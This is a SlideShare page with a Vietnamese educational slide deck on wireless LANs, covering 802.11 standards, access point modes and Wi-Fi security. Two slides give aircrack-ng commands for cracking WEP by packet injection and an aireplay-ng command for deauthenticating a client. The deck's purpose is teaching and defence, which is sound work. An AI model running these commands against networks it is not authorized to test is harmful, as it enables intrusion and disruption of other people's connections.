Wire Less

2,052 views
1,893 views

Published on

Published in: Education, Technology
1 Comment
1 Like
Statistics
Notes
  • Thanks to this slide!
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
2,052
On SlideShare
0
From Embeds
0
Number of Embeds
16
Actions
Shares
0
Downloads
129
Comments
1
Likes
1
Embeds 0
No embeds

No notes for slide
  • fidelity
  • Wire Less

    1. 1. Mạng không dây và Bảo mật
    2. 2. Nội dung <ul><li>Giới thiệu mạng không dây </li></ul><ul><li>802.11 Wireless LAN </li></ul><ul><li>Bảo mật trong Wireless LAN </li></ul><ul><ul><li>WEP và bẻ khóa WEP </li></ul></ul><ul><ul><li>Giới thiệu WPA và WPA-PSK TKIP </li></ul></ul><ul><li>Giải pháp bảo mật Wireless LAN </li></ul>
    3. 3. Giới thiệu Mạng không dây
    4. 4. Mạng không dây và chuẩn 802.11
    5. 5. Một số chuẩn không dây 802.11 Tương thích chuẩn b ≤ 54 Mbps ~ 2.4 GHz 802.11g Hỗ trợ MIMO (MultiIn,MultiOut) ≥ 250 Mbps 802.11n Tương thích chuẩn g ≤ 11 Mbps ~ 2.4 GHz 802.11b Tăng bảo mật: thêm mã hóa và điều khiển truy cập 802.11i Phân mức độ ưu tiên lưu thông: dữ liệu cần thời gian thực (tín hiệu hình, gọi VoIP) truyền trước dữ liệu kém quan trọng hơn (mail, web) 802.11e Không tương thích với hai chuẩn b và g ≤ 54 Mbps ~ 5 GHz 802.11a Ghi chú Tốc độ Tần số Chuẩn
    6. 6. WiMAX (Worldwide Interoperability for Microwave Access) <ul><li>WiMAX , chuẩn 802.16 , tương tự Wi-Fi (802.11a, b, g) về khái niệm nhưng có cải tiến nâng cao hiệu suất và kết nối xa hơn </li></ul><ul><li>Tốc độ truyền dữ liệu 75 Mbps </li></ul><ul><li>Tầm phủ sóng 2 -> 10 km </li></ul><ul><li>Là công nghệ không dây băng thông rộng đang được thử nghiệm </li></ul>
    7. 7. Ưu điểm của Wireless LAN <ul><li>Khả năng mở rộng quản lý cao </li></ul><ul><ul><li>tránh được tình trạng khó đi dây </li></ul></ul><ul><li>Tính linh động </li></ul><ul><ul><li>sử dụng mạng mọi nơi </li></ul></ul><ul><li>Hỗ trợ nhiều loại thiết bị cầm tay </li></ul><ul><li>Tiết kiệm chi phí thiết lập các đường mạng trong tòa nhà và chi phí bảo dưỡng </li></ul>
    8. 8. Nhược điểm của Wireless LAN <ul><li>Phức tạp trong thiết lập, quản lý và vận hành mạng </li></ul><ul><li>Thông tin truyền trên không trung với tần số dùng chung, gây nhiễu và bảo mật </li></ul><ul><li>Tốc độ chưa so sánh được với Wired LAN </li></ul><ul><li>Giá thành </li></ul>
    9. 9. 802.11 Wireless LAN
    10. 10. Thông số định hình một Wireless LAN <ul><li>Chuẩn mạng không dây </li></ul><ul><ul><li>802.11 a / b / g / e / n / i </li></ul></ul><ul><li>Kênh truyền ( channel ) </li></ul><ul><ul><li>Mỹ: 11 kênh; Châu Âu: 13 kênh; Nhật: 14 kênh </li></ul></ul><ul><li>SSID (Service Set Identifier) </li></ul><ul><ul><li>Tên của Wireless LAN </li></ul></ul>
    11. 11. Các thành phần trong Wireless LAN <ul><li>Card mạng không dây </li></ul><ul><ul><li>PCI, USB, PCMCIA </li></ul></ul><ul><li>Access Point </li></ul><ul><li>Router không dây </li></ul>
    12. 12. Chế độ làm việc của Access Point <ul><li>Chế độ gốc ( AP root mode ) </li></ul><ul><li>Chế độ client ( Client mode ) </li></ul><ul><ul><li>Infrastructure </li></ul></ul><ul><ul><li>Ad-hoc </li></ul></ul><ul><li>Chế độ cầu nối ( Bridge mode ) </li></ul><ul><li>Chế độ lặp ( Repeater mode ) </li></ul>
    13. 13. AP root mode
    14. 14. AP client
    15. 15. Repeater
    16. 16. Bridge
    17. 17. Outdoor wireless
    18. 18. <ul><li>- Mô hình mạng không dây ngoài trời(tt) </li></ul><ul><ul><li>- Hoạt động ở băng tầng 2.4Ghz, 5,8 Ghz và kết hợp với nhiều dạng antenna: parabol, yagi, Pannel, Omni để mở rộng khoảng cách và hướng sóng </li></ul></ul><ul><ul><li>- Tốc độ 54Mbps hay 11Mbps </li></ul></ul><ul><ul><li>- Triển khai ở những vị trí không thể đi dây như cảng, trường học, khu vui chơi hay nhà xưởng. </li></ul></ul><ul><ul><li>Ứng dụng: </li></ul></ul><ul><ul><li>- Kết nối giữa các Building với nhau, trung tâm và chi nhánh văn phòng. </li></ul></ul><ul><ul><li>- Kết nối mạng ở những khu vực sân bãi: trường học, cảng, sân bay. </li></ul></ul><ul><ul><li>- Dùng là điểm truy cập internet(HostPot) </li></ul></ul>Outdoor wireless
    19. 19. Antenna <ul><li>AP outdoor Antenna </li></ul>
    20. 20. Bảo mật trong Wireless LAN
    21. 21. Định hình Wireless LAN Security Threat
    22. 22. Bắt dữ liệu trong Wireless LAN không bảo mật Security Threat
    23. 23. Chứng thực trong chế độ không bảo mật
    24. 24. Các chế độ bảo mật <ul><li>WEP </li></ul><ul><li>WPA </li></ul><ul><ul><li>Enterprise </li></ul></ul><ul><ul><li>Personal (WPA-PSK) </li></ul></ul><ul><li>WPA2 </li></ul>
    25. 25. Chứng thực khóa chia sẻ (Shared Key)
    26. 26. Bảo mật với WEP ( W ired E quivalent P rivacy ) Security Threat
    27. 27. Bẻ khóa WEP với aircrack <ul><li>airmon-ng start rausb0 11 </li></ul><ul><li>airodump-ng –c 11 –w out rausb0 </li></ul><ul><li>aireplay-ng -1 0 –e 802.11g-AP –a 00:12:0e:36:6e:43 </li></ul><ul><li>– h 11:22:33:44:55:66 rausb0 </li></ul><ul><li>aireplay-ng -3 -b 00:12:0e:36:6e:43 </li></ul><ul><li>– h 11:22:33:44:55:66 –x 600 rausb0 </li></ul><ul><li>aircrack-ng –n 64 out.cap </li></ul>
    28. 28. Tắt kết nối với card chipset RT2500 <ul><li>aireplay-ng –0 0 </li></ul><ul><li>– a 00:12:0e:36:6e:43 </li></ul><ul><li>– c 00:15:e9:af:44:3f rausb0 </li></ul>
    29. 29. Bảo mật với WPA-PSK TKIP ( W iFi P rotected A ccess – P re S hared K ey T emporal K ey I ntegrity P rotocol) <ul><li>Sử dụng per-packet key </li></ul><ul><li>Tăng khoảng-sử-dụng của IV từ 24 bits thành 48 bits </li></ul><ul><li>Cải tiến CRC bằng Message Integrity Code (MIC) key </li></ul>Security Threat
    30. 31. Giải pháp bảo mật Wireless LAN
    31. 32. Thay đổi thông số mặc định <ul><li>SSID ( S ervice S et Id entifier) </li></ul><ul><li>Kênh truyền (channel) </li></ul><ul><li>Mật khẩu cho phép cấu hình AP </li></ul>
    32. 33. Lọc (Filtering) <ul><li>Lọc SSID </li></ul><ul><ul><li>Không sử dụng SSID mặc định hay có liên quan đến tổ chức </li></ul></ul><ul><ul><li>Không quảng bá SSID </li></ul></ul><ul><li>Lọc địa chỉ MAC </li></ul><ul><li>Lọc giao thức </li></ul>
    33. 34. <ul><li>Bảo mật với WEP và WPA / WPA2 </li></ul><ul><li>Sử dụng công cụ và thiết bị bảo mật </li></ul><ul><li>Thực hiện bảo mật định kỳ </li></ul><ul><li>Bảo vệ mạng ở mức vật lý </li></ul>
    34. 35. Tài liệu tham khảo
    35. 36. <ul><li>Lee Barken , How Secure Is Your Wireless Network? Safeguarding Your Wi-Fi LAN – Chapter 3 4 5, 2003, Prentice Hall PTR, ISBN: 0-13-140206-4 </li></ul><ul><li>International Council of Electronic Commerce Consultants , Ethical Hacking (EC-Council Exam 312-50): Student Courseware – Module 15, 2004, OSB, ISBN: 0972936211 </li></ul><ul><li>Matthew Gast , 802.11 Wireless Networks The Definitive Guide, 2005, O'Reilly </li></ul><ul><li>Micheal Sutton , Hacking the Invisible Network, 2002 iDEFENSE Labs, http://www.idefense.com </li></ul><ul><li>Daniel V. Hoffman , Essential Wireless Hacking Tools </li></ul>

    ×